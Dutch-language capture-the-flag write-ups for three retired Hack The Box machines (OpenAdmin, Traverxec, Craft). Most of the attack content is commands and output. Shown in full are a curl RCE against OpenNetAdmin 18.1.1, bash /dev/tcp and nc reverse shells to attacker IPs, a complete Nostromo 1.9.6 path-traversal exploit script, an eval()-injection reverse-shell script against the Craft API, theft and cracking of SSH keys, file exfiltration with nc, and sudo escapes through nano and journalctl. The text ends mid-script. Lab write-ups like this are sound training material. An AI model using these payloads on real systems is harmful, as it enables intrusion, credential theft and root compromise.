Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 08:23 CEST
Nmap scan report for 10.10.10.171
Host is up (0.090s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.25 seconds
┌─[puck@parrot-lt]─[~/htb/openadmin]
vervolgens draaien we een ffuf
┌─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $ffuf -u http://10.10.10.171/FUZZ -w /usr/share/wordlists/dirb/common.txt

/'___\ /'___\ /'___\ 
/\ \__/ /\ \__/ __ __ /\ \__/ 
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ 
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ 
\ \_\ \ \_\ \ \____/ \ \_\ 
\/_/ \/_/ \/___/ \/_/

v1.3.1-dev
________________________________________________

:: Method : GET
:: URL : http://10.10.10.171/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

.htaccess [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 95ms]
.htpasswd [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 101ms]
.hta [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 102ms]
artwork [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 89ms]
[Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 3530ms]
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 112ms]
music [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 102ms]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 106ms]
:: Progress: [4614/4614] :: Job [1/1] :: 391 req/sec :: Duration: [0:00:14] :: Errors: 0 ::
┌─[puck@parrot-lt]─[~/htb/openadmin]

Ik begon me te concentreren op twee mappen, ONA en muziek. Ik opende de http: //openadmin.htb/ona die me een webpagina bracht. Dit is het OpenNetAdmin-configuratiescherm. De OpenNetAdmin is een opensource IP Address Management (IPAM) -systeem.

Een waarschuwing op de startpagina geeft aan dat de versie van de app 18.1.1 is. Een snelle blik op kwetsbaarheden van versie 18.1.1 op Google, laat zien dat de huidige versie kwetsbaar is voor RCE (uitvoering van externe code). Dus op dit punt begrepen we dat dit vak het slachtoffer is van recent ontdekte exploit.

The ExploitDB listed two exploits, a Metasploit module, and a bash script.

ik download het script gewoon naar mijn OpenAdmin-werkmap en voer het script uit. Het script gaf me meteen een shell als www-data.

┌─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;id&xajaxargs[]=ping" http://10.10.10.171/ona/ | html2text 
<?xml version="1.0" encoding="utf-8" ?>
CDATA[removeElement('tooltips_results');]]>
CDATA[div]]>
CDATA[initialize_window('tooltips_results');el
('tooltips_results').style.display = 'none';el
('tooltips_results').style.visibility = 'hidden';el('tooltips_results').onclick
= function(ev) { focus_window(this.id); };]]>
CDATA[
Ping Results  [/ona/images/icon_close.gif]

uid=33(www-data) gid=33(www-data) groups=33(www-data)
[Unknown INPUT type]
]]>
CDATA[toggle_window('tooltips_results');]]>
┌─[puck@parrot-lt]─[~/htb/openadmin]
nu met een webshell
┌─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.14.3/443 0>%261'&xajaxargs[]=ping" http://10.10.10.171/ona/

en pak de shell

┌─[✗]─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $sudo nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.171] 54102
bash: cannot set terminal process group (1237): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@openadmin:/opt/ona/www$

 

Omdat de www-data van de gebruiker een gebruiker met weinig rechten is, kunnen we geen grote taken uitvoeren. Dus moeten we zijn privilege escaleren naar de volgende grote gebruiker.

Je kan natuurlijk ook lekker Burpen, zoals hieronder

en dan een Netcat reverse Shell zonder nc -e  gebruiken

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.70 443 >/tmp/f

Natuurlijk wel eerst even url encoden CTRL-u in Burp.

Eerst moeten we de gebruikers in vinden. laten we cat / etc / passw gebruiken

te vinden

-knip-
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

We hebben dus een aantal gebruikers in dit vak gevonden, maar ik weet niet zeker met welke ik hierboven moet beginnen om het privilege te krijgen. laten we beginnen met het opsommen van het vak op zoek naar hints.

Na een tijdje vond ik een PHP-bestand met de naam “database_settings.inc.php” in de map; / Opt / ona / www / local / config /. Het bestand heeft MySQL-databasereferenties.

Tot nu toe weten we niet zeker welke gebruiker we deze gegevens kunnen gebruiken, dus heb ik de huidige lokale gebruikers van de box vermeld en vond ik jimmy en joanna.
www-data@openadmin:/opt/ona/www$ cat /opt/ona/www/local/config/database_settings.inc.php
</opt/ona/www/local/config/database_settings.inc.php
<?php

$ona_contexts=array (
'DEFAULT' => 
array (
'databases' => 
array (
0 => 
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);

?>www-data@openadmin:/opt/ona/www$

PRIVILEGE ESCALATIE

Terwijl de SSH liep, probeerde ik de doos als jimmy, gelukkig werkte het.

root@kali:~/htb# ssh jimmy@10.10.10.171
The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.171' (ECDSA) to the list of known hosts.
jimmy@10.10.10.171's password: n1nj4W4rri0R!
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed Jan 8 12:44:49 UTC 2020

System load: 1.25 Processes: 147
Usage of /: 49.1% of 7.81GB Users logged in: 1
Memory usage: 31% IP address for ens160: 10.10.10.171
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Jan 8 12:25:57 2020 from 10.10.14.11
jimmy@openadmin:~$ ls
jimmy@openadmin:~$ id
uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)

Na een tijdje is echter vastgesteld dat deze gebruiker geen gebruikersvlag heeft, dus laten we doorgaan met het opsommen van meer. De www-map van de gebruiker heeft een speciale map met de naam ‘intern’ die bevat,

jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 Nov 23 17:43 .
drwxr-xr-x 4 root root 4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal 339 Nov 23 17:40 main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1/main.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
jimmy@openadmin:/var/www/internal$
jimmy@openadmin:/var/www/internal$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - 
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN - 
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - 
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - 
tcp6 0 0 :::80 :::* LISTEN - 
tcp6 0 0 :::22 :::* LISTEN - 
udp 0 0 127.0.0.53:53 0.0.0.0:* - 
jimmy@openadmin:/var/www/internal$
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$
root@kali:~/htb/openadmin# ssh -i id_rsa joanna@10.10.10.171
Enter passphrase for key 'id_rsa': bloodninjas
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu Jan 9 15:12:18 UTC 2020

System load: 1.08 Processes: 136
Usage of /: 49.0% of 7.81GB Users logged in: 1
Memory usage: 30% IP address for ens160: 10.10.10.171
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jan 9 09:46:48 2020 from 10.10.16.70
joanna@openadmin:~$ cat user.txt 
c9b2cf07d40807e62af62660f0c81b5f
joanna@openadmin:~$

ROOT verkrijgen

Procedure 1: de root-vlag van nano verkrijgen:

De opdracht sudo -l onthulde dat de gebruiker Joanna bin / nano / opt / priv als root zonder wachtwoord kan uitvoeren. Als je ziet dat de gebruiker nano als root kan uitvoeren, is dit het eenvoudigste om te exploiteren. Slechts 3 commando’s en de doos is van jou.

voer uit:

joanna@openadmin:~$ sudo /bin/nano /opt/priv
Procedure 2 : rootshell

gtfobins has a page on nano. The path to get shell from sudo is as follows:

sudo nano
^R^X
reset; sh 1>&0 2>&0

This will give you a root shell 🙂

Dat is het. bedankt voor het lezen.

HTB-TRAVERXEC-NL

Traverxec, begint met een openbare exploit op de Nostromo-webserver voor de eerste positie. Vervolgens sommen we een directory op die leesbaar is door www-data in de home directory van een David-gebruiker. Daar vinden we een SSH-sleutel. we vinden een server-start.sh in de hoofddirectory van davids en we gebruiken gtfobin’s om root te krijgen.

Zoals altijd beginnen we met een nmap scan.

# Nmap 7.80 scan initiated Mon Jan 6 07:38:53 2020 as: nmap -sC -sV -oA traverxec_nmap 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.031s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 6 07:39:08 2020 -- 1 IP address (1 host up) scanned in 15.62 seconds

We have port 22 and 80 open on Traverxec.

Een Web Shell verkrijgen met Nostromo

Hoewel we kunnen zien dat Nmap Nostromo 1.9.6 uit de headers heeft gehaald, maar ik heb gecontroleerd of er iets op de website staat, hoewel er niets anders was dan een sjabloon voor een gebruiker met de naam David en zijn portfoliowebsite.

Traverxec port 80
Traverxec poort 80

na rond te hebben gekeken, en niets vond. opende ik “Burp” en onderschepte de website en ontdekte dat er een banner en versie van de server waren in de de reactie van de server.

Traverxec Server Header
Traverxec Server HeaderOmdat ik Nostromo 1.9.6 in mijn Nmap-resultaten duidelijk negeerde, was dit een nieuwe bevinding en begon ik te zoeken of er openbare exploits zijn voor deze versie van Nostromo. Ik vond dat dit een directory-transversale RCE exploiteerde. Lees hier meer over het beveiligingslek hier. https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html . Dit is het exploit-script dat ik heb gebruikt.https://github.com/puckiestyle/python/blob/master/nostromo196-rce.py
root@kali:~/htb/traverxec# cat nostromo-rce.py 
#!/usr/bin/env python

import socket
import argparse

parser = argparse.ArgumentParser(description='RCE in Nostromo web server through 1.9.6 due to path traversal.')
parser.add_argument('host',help='domain/IP of the Nostromo web server')
parser.add_argument('port',help='port number',type=int)
parser.add_argument('cmd',help='command to execute, default is id',default='/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat /root/root.tx',nargs='?')
args = parser.parse_args()

def recv(s):
	r=''
	try:
		while True:
			t=s.recv(1024)
			if len(t)==0:
				break
			r+=t
	except:
		pass
	return r
def exploit(host,port,cmd):
	s=socket.socket()
	s.settimeout(1)
	s.connect((host,int(port)))
	payload="""POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1""".format(cmd)
	s.send(payload)
	r=recv(s)
	r=r[r.index('\r\n\r\n')+4:]
	print r

exploit(args.host,args.port,args.cmd)

Vervolgens heb ik misbruik gemaakt van dit beveiligingslek en kreeg ik een shell terug

root@kali:~/htb/traverxec# python nostromo196-rce.py 10.10.10.165 80 
Enter your command:id
HTTP/1.1 200 OK
Date: Wed, 08 Jan 2020 08:30:35 GMT
Server: nostromo 1.9.6
Connection: close


uid=33(www-data) gid=33(www-data) groups=33(www-data)

Enter your command:which nc
HTTP/1.1 200 OK
Date: Wed, 08 Jan 2020 08:30:39 GMT
Server: nostromo 1.9.6
Connection: close


/usr/bin/nc

Enter your command:nc -e /bin/sh 10.10.16.70 443
HTTP/1.1 200 OK
Date: Wed, 08 Jan 2020 08:32:09 GMT
Server: nostromo 1.9.6
Connection: close

Enter your command:
Traverxec Shell
root@kali:~/htb/traverxec# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.165] 38412
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/usr/bin$

User on Traverxec

Dus ik kwam in Traverxec als www-data en ik runde LinEnum en vond niets. Het eerste wat logisch was, was om in de map van Traverxec te zoeken naar configuratiebestanden om referenties te vinden. Dus ik heb de map / var / nostromo / conf gecontroleerd. Ik vond dit in de uitvoer van LinEnum en dit werd gevonden als leesbare www-data, dus we zullen het bestand nhttpd.conf bekijken.

www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf 
# MAIN [MANDATORY]
servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html
# LOGS [OPTIONAL]
logpid			logs/nhttpd.pid
# SETUID [RECOMMENDED]
user			www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons			/var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs		/home
homedirs_public		public_www

toen ik het configuratiebestand las, leek het erop dat er een public_www-directory in a / home is, maar we kunnen de David niet lezen, maar het lijkt erop dat er een public_www in David’s home-directory is.de ssh files aldaar heb ik vervolgens gedownload met netcat

www-data@traverxec:/home/david/public_www/protected-file-area$ ls -la
ls -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25 17:02 .
drwxr-xr-x 3 david david 4096 Oct 25 15:45 ..
-rw-r--r-- 1 david david 45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25 17:02 backup-ssh-identity-files.tgz. 
www-data@traverxec:/home/david/public_www/protected-file-area$ nc -w 3 10.10.16.70 1234 < backup-ssh-identity-files.tgz
root@kali:~/htb/traverxec# nc -l -p 1234 > backup-ssh-identity-files.tgz
root@kali:~/htb/traverxec# python2 sshng2john.py id_rsa > id_rsa.encrypted
root@kali:~/htb/traverxec# john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (id_rsa)
Warning: Only 1 candidate left, minimum 2 needed for performance.
1g 0:00:00:13 DONE (2020-01-07 08:28) 0.07621g/s 1093Kp/s 1093Kc/s 1093KC/s *7¡Vamos!
Session completed

Nu loggen we in met Davids SSH-sleutel met wachtwoord :  hunter.

root@kali:~/htb/traverxec# ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': hunter
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Wed Jan 8 02:45:02 2020 from 10.10.16.70
david@traverxec:~$ ls -la
total 44
drwx--x--x 6 david david 4096 Jan 8 03:38 .
drwxr-xr-x 3 root root 4096 Oct 25 14:32 ..
lrwxrwxrwx 1 root root 9 Oct 25 16:15 .bash_history -> /dev/null
-rw-r--r-- 1 david david 220 Oct 25 14:32 .bash_logout
-rw-r--r-- 1 david david 3526 Oct 25 14:32 .bashrc
drwx------ 2 david david 4096 Jan 8 03:31 bin
-rw------- 1 david david 147 Jan 8 03:38 .lesshst
drwxr-xr-x 3 david david 4096 Jan 7 08:38 .local
-rw-r--r-- 1 david david 807 Oct 25 14:32 .profile
drwxr-xr-x 3 david david 4096 Oct 25 15:45 public_www
drwx------ 2 david david 4096 Jan 8 00:02 .ssh
-r--r----- 1 root david 33 Oct 25 16:14 user.txt
david@traverxec:~$

Root verkrijgen

Het eerste wat me opviel toen ik de gebruiker kreeg bij het escaleren van privileges, is dat er een bin-map in de basismap van David is met een bestand met de naam server-stats.sh. dieper kijken om het script te begrijpen. Ik zag dat / usr / bin / journalctl als root wordt uitgevoerd. dus ging ik naar GTFObin’s https://gtfobins.github.io/gtfobins/journalctl/ vond dit eenvoudig dat commando uitgevoerd zoals gegeven in het script en benutte de minder prompt die wordt geopend als sudo met dit! / bin / bash.

Er is echter een addertje onder het gras, zodat je terminal kleiner wordt of het werkt niet omdat de pager alleen wordt geopend als je terminal kleiner is dan het bestand.

Het script retourneert de laatste 5 regels van de nostromo-servicelogboeken met journalctl. Dit is misbruikbaar omdat journalctl de standaard pager aanroept, die waarschijnlijk less is. Hoe minder commando geeft uitvoer weer op het scherm van de gebruiker en wacht op invoer van de gebruiker zodra de inhoud wordt weergegeven. Deze kan worden misbruikt door een shell-opdracht uit te voeren. /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service Het bovenstaande commando zal less aanroepen, waarna we shell-commando’s kunnen uitvoeren door een voorvoegsel te geven! . Laten we proberen /bin/bash uit te voeren. !/bin/bash

david@traverxec:~/bin$ sudo journalctl -n5 -unostromo.service

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2022-05-13 08:47:02 EDT, end at Fri 2022-05-13 10
May 13 08:47:04 traverxec systemd[1]: Starting nostromo nhttpd server.
May 13 08:47:04 traverxec nhttpd[420]: started
May 13 08:47:04 traverxec nhttpd[420]: max. file descriptors = 1040 (c
May 13 08:47:04 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# cat /root/root.txt 
9aa36a6d76f785dfd320a478f6e0d906
root@traverxec:/home/david/bin#

 

Auteur : Jacco Straathof

 

HTB-CRAFT-NL

Craft is  met pensioen. Ik vond het heel leuk om het op te lossen. Het IP-adres is 10.10.10.110 en ik heb het toegevoegd aan / etc / hosts als craft.htb. Laten we meteen verder gaan!

Scan

root@kali:~/htb/craft# nmap -sV -O craft.htb -oN scan.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-07 05:32 EST
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 05:33 (0:00:12 remaining)
Nmap scan report for craft.htb (10.10.10.110)
Host is up (0.054s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4p1 Debian 10+deb9u5 (protocol 2.0)
443/tcp open  ssl/http nginx 1.15.8
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/7%OT=22%CT=1%CU=38176%PV=Y%DS=2%DC=I%G=Y%TM=5E145E69
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=8)OPS(
OS:O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11
OS:NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.43 seconds

Poort 443 is open, wat betekent dat er een (waarschijnlijk) HTTPS-site op draait. Ik heb https: //craft.htb geopend in een browser:

In de rechterbovenhoek vond ik knoppen die me naar 2 verschillende subdomeinen brachten: api.craft.htb en gogs.craft.htb. Ik voegde deze toe aan /etc/hosts

Enumerating de 2 Sub-Domeinen

api.craft.htb, was niet erg interessant, omdat er een API werd gehost die alleen toegankelijk was met geldige inloggegevens.

Voordat ik de API testte, wilde ik ervoor zorgen dat er niets eenvoudiger te exploiteren was gogs.craft.htb.

Het bleek dat ik gelijk had. Er is een publiek toegankelijke repository die de broncode van de API bevat:

Bovendien was er een interessant “issue”:

Dinesh:
Fix is live and seems to be working :)

c414b16057

Gilfoyle:
I fixed the database schema so this is not an issue now.. Can we remove that sorry excuse for a "patch" before something awful happens?

Ik heb de commit bekeken die de patch bevatte en zag meteen de kwetsbaarheid:

https://gogs.craft.htb/Craft/craft-api/commit/c414b160578943acfe2e158e89409623f41da4c6

De ‘patch’ gebruikt eval () om te controleren of de ABV-waarde (wat dat ook was less) kleiner is dan 1. eval () mag nooit worden gebruikt voor gebruikersinvoer, omdat een kwaadwillende aanvaller deze kan gebruiken om RCE te behalen. Op dit moment wist ik dat ik een shell kon krijgen als ik een geldige gebruikersnaam / wachtwoord-combinatie had.

Credentials and ‘Shell As Root’

After I started looking for credentials, it wasn’t long before I found them. As it tuned out, Dinesh initially added a test script with his credentials:

https://gogs.craft.htb/Craft/craft-api/commit/10e3ba4f0a09c778d7cec673f28d410b73455a86
response = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)

Nu ik geldige gegevens had, maakte ik een eenvoudig script dat een omgekeerde shell zou voortbrengen:

#!/usr/bin/env python
 
import requests
import json
 
response = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
json_response = json.loads(response.text)
token =  json_response['token']
 
headers = { 'X-Craft-API-Token': token, 'Content-Type': 'application/json'  }
 
print("Spwaning a reverse shell on port 443...")
brew_dict = {}
brew_dict['abv'] = '__import__("os").system("nc 10.10.14.156 443 -e /bin/sh &amp;") #'
brew_dict['name'] = 'bullshit'
brew_dict['brewer'] = 'bullshit'
brew_dict['style'] = 'bullshit'
 
json_data = json.dumps(brew_dict)
